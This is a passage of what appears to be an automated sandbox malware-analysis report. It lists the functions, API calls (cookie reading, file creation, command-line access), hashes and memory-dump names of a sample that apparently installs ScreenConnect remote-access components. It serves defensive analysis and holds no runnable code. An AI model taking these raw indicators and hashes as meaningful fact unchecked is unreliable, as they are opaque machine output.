Opcode ID: 093cad9bd57e6e46c70e285cee6ac9be31826b400d26f9a99bc0ed60c87e31d8
Instruction ID: e95df13fda7e6468d5cefcef21d315bba3be4813da1d86d35af7baec9748d76c
Opcode Fuzzy Hash: 093cad9bd57e6e46c70e285cee6ac9be31826b400d26f9a99bc0ed60c87e31d8
Instruction Fuzzy Hash: DA01C431D01B719BCB61DFB985416ADB370BF08B60B14020BE8626B381C7706D828FC1

Function 00AD55CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00AD55CE
GetCommandLineW.KERNEL32 ref: 00AD55D9

Strings

x%, xrefs: 00AD55D4

Memory Dump Source

Source File: 00000000.00000002.2732069976.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true

Associated: 00000000.00000002.2732054241.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732086023.0000000000ADB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732100757.0000000000AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2732115689.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_support.jbxd

Similarity

API ID: CommandLine
String ID: x%
API String ID: 3253501508-3965708740
Opcode ID: 030d5aedd23297a1e84f87ce5c8c88d614e0840a775a8a827509998931c108bd
Instruction ID: fb48a38d3661e69444bc23e2818b29c216898f02657231b7217997dc315a29f4
Opcode Fuzzy Hash: 030d5aedd23297a1e84f87ce5c8c88d614e0840a775a8a827509998931c108bd
Instruction Fuzzy Hash: 78B04878912291CB8700EFA2BD880893BA0A6486063820056D82686230E738008A8B20

Analysis Process: dfsvc.exePID: 7120, Parent PID: 7040COMMON

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	109
Total number of Limit Nodes:	10

Executed Functions

Function 00007FFD9B891548 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 00007FFD9B891733

Memory Dump Source

Source File: 00000001.00000002.3573450931.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: d939bb5d0dff470c1fcc8fa925405097ceb2df4c70846cd2ec13f2e622b71f4b
Instruction ID: 374f0b4953c79a750815961e44da1c3bc0ad865c66d9032f63054b6eeffafbdd
Opcode Fuzzy Hash: d939bb5d0dff470c1fcc8fa925405097ceb2df4c70846cd2ec13f2e622b71f4b
Instruction Fuzzy Hash: 9EB16E21B0FBCA1FDB56DBBC58692687FD1EF56350B0941BFC049C71E7EA28A9068341

Function 00007FFD9B89E8E2 Relevance: 1.8, APIs: 1, Instructions: 281
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetGetCookieW.WININET ref: 00007FFD9B89EAC6

Memory Dump Source

Source File: 00000001.00000002.3573450931.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: 9fc980b890e850857a44a0f46bd310d24ac1df925d3dda45cc5b1ddbccd098c3
Instruction ID: c6056aac04ac4bc6592d49aa1622ca9d20c08144fd65fa6662bce14e3cc89d1a
Opcode Fuzzy Hash: 9fc980b890e850857a44a0f46bd310d24ac1df925d3dda45cc5b1ddbccd098c3
Instruction Fuzzy Hash: B0910330608B8D8FDB69DF28C8557E93BE1FF59311F04426BE84DC76A2CA74A945CB81

Function 00007FFD9B8999F5 Relevance: 1.7, APIs: 1, Instructions: 168
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFD9B899B1C

Memory Dump Source

Source File: 00000001.00000002.3573450931.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 074f64bf0ec8bf52d3bc196b29dc59390f5da6af7c94b212824cffdeb844a8dc
Instruction ID: bd4c071a2afa00704d1123ede1d940d72ac4062df5228b1e3258e887f7950a59
Opcode Fuzzy Hash: 074f64bf0ec8bf52d3bc196b29dc59390f5da6af7c94b212824cffdeb844a8dc
Instruction Fuzzy Hash: 0A51807090CB5C8FDB68DF589845BE97BE0FB59310F1442AEE04DD3252CB34A955CB81

Function 00007FFD9B77EEC0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3572875578.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b77d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2258ba7fd803fa846f5e1d64489a986dc1ecda91ac499b6d010db2618d4134
Instruction ID: bb93b90eee33147c483b7df04c64350f5b192d684b744bcea3e1c32108e82aa5
Opcode Fuzzy Hash: 5d2258ba7fd803fa846f5e1d64489a986dc1ecda91ac499b6d010db2618d4134
Instruction Fuzzy Hash: 8941187190EBC84FE3969B3898959523FF4EF57320B1502DFD088CB1B3D665A846C7A2

Analysis Process: ScreenConnect.WindowsClient.exePID: 2044, Parent PID: 7120COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B874890 Relevance: 1.7, APIs: 1, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 00007FFD9B88F2C6

Memory Dump Source

Source File: 00000006.00000002.1991031623.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c24109c269a57b871550a7e3787bbe79b66f2ae0df70a2b74d45212e082ceb9e
Instruction ID: 6e13eb6c72ab9eb9fd735cc03f285e1fd15a50ed38cacce7ea8c472f4b68e18b
Opcode Fuzzy Hash: c24109c269a57b871550a7e3787bbe79b66f2ae0df70a2b74d45212e082ceb9e
Instruction Fuzzy Hash: D1616C72A1EBC80FE724CB9C68552BC7BE1EB9A314F0841BFE488831B7D565AD05C381

Function 00007FFD9B87F67B Relevance: 1.7, APIs: 1, Instructions: 178
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B87F7AC

Memory Dump Source

Source File: 00000006.00000002.1991031623.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d09f473a6fa8c4fa3009cdb86868d9f2d3edf0a9b43ab2e2e2debf296de3c9f9
Instruction ID: 2a2f0d0374d79ca47958f8adf58c7af8dd1868fb154a2e6b6e7ee5d64e7902d7
Opcode Fuzzy Hash: d09f473a6fa8c4fa3009cdb86868d9f2d3edf0a9b43ab2e2e2debf296de3c9f9
Instruction Fuzzy Hash: 27519071A0CA5C9FDB68DF58D845BE9BBE0FB59310F1442AEE04DD3252CB34A985CB81

Function 00007FFD9B873EAA Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B878542

Memory Dump Source

Source File: 00000006.00000002.1991031623.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
Instruction ID: e62e2053fd183bffaa575cd28e5fa4152c31d94ac737d60a7b4cbb58092c759a
Opcode Fuzzy Hash: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
Instruction Fuzzy Hash: 2E21E67191CB188FDB28AF9DDC4AAF97BE0EB59711F00413EE04AD3251DB74B8468B81

Function 00007FFD9B8784B8 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B878542

Memory Dump Source

Source File: 00000006.00000002.1991031623.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 6aa889fb38c4478b09396ed3dc6917008b626afb396986dd6c676878c9ca573f
Instruction ID: 180d0dde5aaf3f1640fb75baddd69ec88c2be638f5a6f06de10778982bebc141
Opcode Fuzzy Hash: 6aa889fb38c4478b09396ed3dc6917008b626afb396986dd6c676878c9ca573f
Instruction Fuzzy Hash: EC31D77191CB188FDB28DF9D9C4A9F97BE0EB59711F00416FE049D3252DB74A845CB82

Function 00007FFD9B873DFA Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FFD9B88F4DC

Memory Dump Source

Source File: 00000006.00000002.1991031623.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
Instruction ID: 1614468d12f753d8a73a34d6c3a47f9e533e855d3a9afe7c502560f6a4951a4a
Opcode Fuzzy Hash: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
Instruction Fuzzy Hash: 7621C431908A1C9FDB5CDF98D445BF9B7E0EB59321F10422ED04DD3251DB74A856CB90

Analysis Process: ScreenConnect.ClientService.exePID: 4904, Parent PID: 2044COMMON

Executed Functions

Function 00EE1828 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

$^q, xrefs: 00EE188D
$^q, xrefs: 00EE1899

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 6a0594cad31ff66c0f00680dc1577fd162cbfd2e79b400c5ec1ec1c3229b5e6d
Instruction ID: 45ec586ac81f4abff0969726c5d6e1e5fad48e5cfd249136adcfa8907a7093e9
Opcode Fuzzy Hash: 6a0594cad31ff66c0f00680dc1577fd162cbfd2e79b400c5ec1ec1c3229b5e6d
Instruction Fuzzy Hash: 9D018F38A093888FC7199BB6D4188193FB5EF8A31431644EAE4098B276CB75DC46CB55

Function 00EE20B5 Relevance: 2.9, Strings: 2, Instructions: 370COMMON

Download Yara Rule

Strings

nCvq, xrefs: 00EE2351
, xrefs: 00EE237E

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq$
API String ID: 0-222869378
Opcode ID: f8c4958e08f3685ba1e04eeb1bd7cbcdb54c446ddd321e5b6d1d219b11ff9642
Instruction ID: d29fda001335d20fc0dba6660f26170714bc1f0a265509ce5c5f1802cb74b740
Opcode Fuzzy Hash: f8c4958e08f3685ba1e04eeb1bd7cbcdb54c446ddd321e5b6d1d219b11ff9642
Instruction Fuzzy Hash: 7C51BC397002458FC714DF3AD854AAEB7E6EF88304B1484A9D50AEB3A5EF74DC06CB90

Function 00EE5238 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

(bq, xrefs: 00EE525A

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 14ce4f29aba552a26eccd3890a1e3a61eba734b3eef7870db998f2b366d39b6f
Instruction ID: 9dd34e991a49d8e4d0890fd0fe6a537f855c8a39f4e466a4a796e1b6b7101e09
Opcode Fuzzy Hash: 14ce4f29aba552a26eccd3890a1e3a61eba734b3eef7870db998f2b366d39b6f
Instruction Fuzzy Hash: DE61F635B106098FCB04DFA9D994A6EB7F2FF8D319B119069E506AB365DB30EC01DB40

Function 00EE6F40 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00EE70CB

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: b64ac35fc0545265123bca2677f2f4247b718964a9544fb2412996d83e6a974e
Instruction ID: d89a669f9d07df0973f422cb896f869b3e24eeed584282216c6008e0de144aab
Opcode Fuzzy Hash: b64ac35fc0545265123bca2677f2f4247b718964a9544fb2412996d83e6a974e
Instruction Fuzzy Hash: 2D510530B082489FDB14DB75E854B6EBBF2FF84304F148969E486EB2A1DB319C45CB81

Function 00EE42F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 00EE4311

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 217998696e256d90872f0345998c51a30c1bdaf8e03e5dc8f7fefc4791dea3f0
Instruction ID: 0655a6c173e2f2697472a0ab7a519d367b88775431dc76f7b7ef7b2198a6462d
Opcode Fuzzy Hash: 217998696e256d90872f0345998c51a30c1bdaf8e03e5dc8f7fefc4791dea3f0
Instruction Fuzzy Hash: 2A41E030B00109CBCF14EFA9E584A6EBBA2FFC4315B04C569D815AB295DB34EC06CB90

Function 00EE3480 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

[', xrefs: 00EE3548

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: 1a068903384fc22f3cf1e8ba1eeaae16efc4f5b76d83e8ea0c64e6a699a27bca
Instruction ID: f4c4553532b1667f55cad7ab2c4c03009c1f6f59482a240f3fc455a99c63396a
Opcode Fuzzy Hash: 1a068903384fc22f3cf1e8ba1eeaae16efc4f5b76d83e8ea0c64e6a699a27bca
Instruction Fuzzy Hash: E33103397006115FCB05AB79989485FBBE2EBC634070085BCE816EB344EFB0EE098BD0

Function 00EE4940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab6f77bca1eb063de92ad532f5039469f9b0672e02c98dac64e63d96dd2c9363
Instruction ID: 4bac6dbf09d7979294de2f500ba002e85ff2b4d0136de0a8cc96e5e250617d21
Opcode Fuzzy Hash: ab6f77bca1eb063de92ad532f5039469f9b0672e02c98dac64e63d96dd2c9363
Instruction Fuzzy Hash: F2512C742007058FC724CF6AD884A56B7F2FF8D325B145A6CD49AAB7E4E731E846CB44

Function 00EE7770 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3ff1e0309380e13a2cb1087b5ca2609e70236537c0a8e00f743ba5e10e85236
Instruction ID: b98ccdff8b0fb8cb91f5329fd17c2419413a500dd538dc01d147e55df9be936b
Opcode Fuzzy Hash: b3ff1e0309380e13a2cb1087b5ca2609e70236537c0a8e00f743ba5e10e85236
Instruction Fuzzy Hash: 15517134E003099FCB05EFB8D944B9DBBB1FF89300F108569E104AB3A4EB75A989CB50

Function 00EE3678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c92f36112a1c2596344b94d4ea9960922acf3891eaf2f5961f6b304c19864ab
Instruction ID: 72128ca2793b2782f0ab532e1f95d06743b68fbe28618c810b3f08420157f097
Opcode Fuzzy Hash: 5c92f36112a1c2596344b94d4ea9960922acf3891eaf2f5961f6b304c19864ab
Instruction Fuzzy Hash: 9A415FB86007498FCB24DF7AD948A9AB7F1FF44711B104A29D456DB7A0EB30EE45CB90

Function 00EE366C Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1515045accac65632a85d92d1e4e9dfa15a47586210e957f979381f0128118
Instruction ID: 1218ff60b1941616d3baed1f420d5f2b0254ae1b2c8e84d27cff65160f347630
Opcode Fuzzy Hash: 4c1515045accac65632a85d92d1e4e9dfa15a47586210e957f979381f0128118
Instruction Fuzzy Hash: DF4160B86007498FCB24DF7AD948AAAB7F1FF44311B204A29D456D77A0D730EE45CB90

Function 00EE3DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c0647c274b4df28bde1b0dacd89dd5374ecdfa625a6c1db0d595e5f03722f4
Instruction ID: 489bd565c2573c34b101c3a39630e827d5b5fa32253dae6a5d63a7f7d9345127
Opcode Fuzzy Hash: a2c0647c274b4df28bde1b0dacd89dd5374ecdfa625a6c1db0d595e5f03722f4
Instruction Fuzzy Hash: 78319E31B0020A8BDB14DF6AC458AAFF7F5EF89354F10946AE506E77A4DB31DD018B90

Function 00EE3828 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb34522f1f8bcf5b1b2814429d946b1afd2cd5baa187131c75b03accb84c399c
Instruction ID: 9a01c75b9487950f9248260a54e8e48b2b9c59b4c190cbd56727b1565b3f5846
Opcode Fuzzy Hash: eb34522f1f8bcf5b1b2814429d946b1afd2cd5baa187131c75b03accb84c399c
Instruction Fuzzy Hash: 6D31DF35F0428A8FCB099B79C85456EFBB6EFC5310B1481AAE508EB395DB319E01C796

Function 00EE5548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf18f8bbe06634689f2b838af52325bc5337d36f0cef4ed4fb969782fa94629
Instruction ID: f1d7537733b8d0775e34401918de886c1c91982aa1b729697d5272cf149c3794
Opcode Fuzzy Hash: eaf18f8bbe06634689f2b838af52325bc5337d36f0cef4ed4fb969782fa94629
Instruction Fuzzy Hash: A8313A31600B058FC730CF2AD884A6AB7F2FF89329B144A1CD496DB7A4D730E805CB91

Function 00EE4FD0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9f0027cd39de756e3f237080129327faf0d3b04ba5677e860bd477fc1e2c57
Instruction ID: 64d7eb25e8730195122f6a9754dc55746fcc5d2b5115dfe3434a48ebe0640b34
Opcode Fuzzy Hash: 3c9f0027cd39de756e3f237080129327faf0d3b04ba5677e860bd477fc1e2c57
Instruction Fuzzy Hash: D4318236E0014ADFCF04DFA8D9409CEBBB2FF89315F148069E909BB261D735691ACB90

Function 00EE5197 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de6f74a068376de8fc45f50f078c0c82fc5cac16ba51fa593a5718cffd8ae1b
Instruction ID: 1ab11b5b31a605b81cbbf5af070db50261180303873f0962ec046ba735549e0f
Opcode Fuzzy Hash: 5de6f74a068376de8fc45f50f078c0c82fc5cac16ba51fa593a5718cffd8ae1b
Instruction Fuzzy Hash: 8B21B036B043149FCB01DB78E88089EBBE6EF85360B14852AF949DB355EB74DD05CB90

Function 00EE50C1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5895cc63dbc2ae46179af78de6109c7f45310a0b9885eae722b1e86bc5cd0245
Instruction ID: f2fda7183857ec1391adda0ae960c094a3ba6c93e88723ca550e2e769c65f074
Opcode Fuzzy Hash: 5895cc63dbc2ae46179af78de6109c7f45310a0b9885eae722b1e86bc5cd0245
Instruction Fuzzy Hash: 7E21273AB002145FD704EB78E99166EBBA2DFC1300F04C528E945DB395DF70AD0A87D1

Function 00EE4B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc75162790938018359fec23f9034a9cfa3a03808483ac61d514b24ff55f8ab4
Instruction ID: c0f5ffd90b574fc899e67c1822a38cbced7ddeb1233174203169134694b687f9
Opcode Fuzzy Hash: bc75162790938018359fec23f9034a9cfa3a03808483ac61d514b24ff55f8ab4
Instruction Fuzzy Hash: 6C2119702007498FD734CF66D848A9AB7F1EF84325B108A2DD496A76E1DB31E94ACF80

Function 00EE50D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165a40e6baef5e6ac88b73cf775c813009dd5d13d78f0d9bc582546e32a77032
Instruction ID: ebfab1320785d47c24ee5acbabaa221eca60a7f527af3c8a11c458a30b8b5a3d
Opcode Fuzzy Hash: 165a40e6baef5e6ac88b73cf775c813009dd5d13d78f0d9bc582546e32a77032
Instruction Fuzzy Hash: DD11B635B402145BDB04EB68E99166EB7A7EFC5310F40C524F905DB395DF70AE0987D1

Function 00EE4F41 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4854fba592d3eafaab1278947b948980913113085888edb82946b1d1e94362cd
Instruction ID: d6537a51fc96c4174b561d9e83e1901d278ab1017c56466280fe5883e511ebf4
Opcode Fuzzy Hash: 4854fba592d3eafaab1278947b948980913113085888edb82946b1d1e94362cd
Instruction Fuzzy Hash: 5C1146359002099FCF01DFA8C9409DEBBB1FF4A354B108595E909FF161D7716E0ACB90

Function 00EE5649 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4523ba734db594788285729f932c86b823a6f2e1b9fd3f07efb40578a71f8c7a
Instruction ID: d522bd34a26796cb8e0e99f4cb4978352a8f0771f0f1971e9e436e78eb1a2f37
Opcode Fuzzy Hash: 4523ba734db594788285729f932c86b823a6f2e1b9fd3f07efb40578a71f8c7a
Instruction Fuzzy Hash: 11119171E007499FDB21CF69C8509EABBB6AFC0314F54846AD544EB165E7718902CB90

Function 00EE5658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c6cc4f8fefb5e4b9c70d43c689434725dd90295cde07e0b4ea4d7ee8665f08
Instruction ID: 4c07c46cf1e363d67020d5ce12e79a10ee0bfd77c9486fcb46bf2f95a0b54f34
Opcode Fuzzy Hash: 50c6cc4f8fefb5e4b9c70d43c689434725dd90295cde07e0b4ea4d7ee8665f08
Instruction Fuzzy Hash: F511A171F0064AAFDB24CE6AC800AABB7B6AFC4314F54C57AE514E7254E771DE01CB90

Function 00EE5035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9fae114f087ec2ba5752de26bd864fc66df173af2cf37de0cf29a6a463e126
Instruction ID: 582b798ad910ad43ae9f4cc8f408160429d0118cf8d10f5f8d6119a81508c667
Opcode Fuzzy Hash: 5a9fae114f087ec2ba5752de26bd864fc66df173af2cf37de0cf29a6a463e126
Instruction Fuzzy Hash: 94114C3254005DDBCB01EFA8D5848DCBBB2EF81318F58D494E005BB169D771E986CBA0

Function 00EE4F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

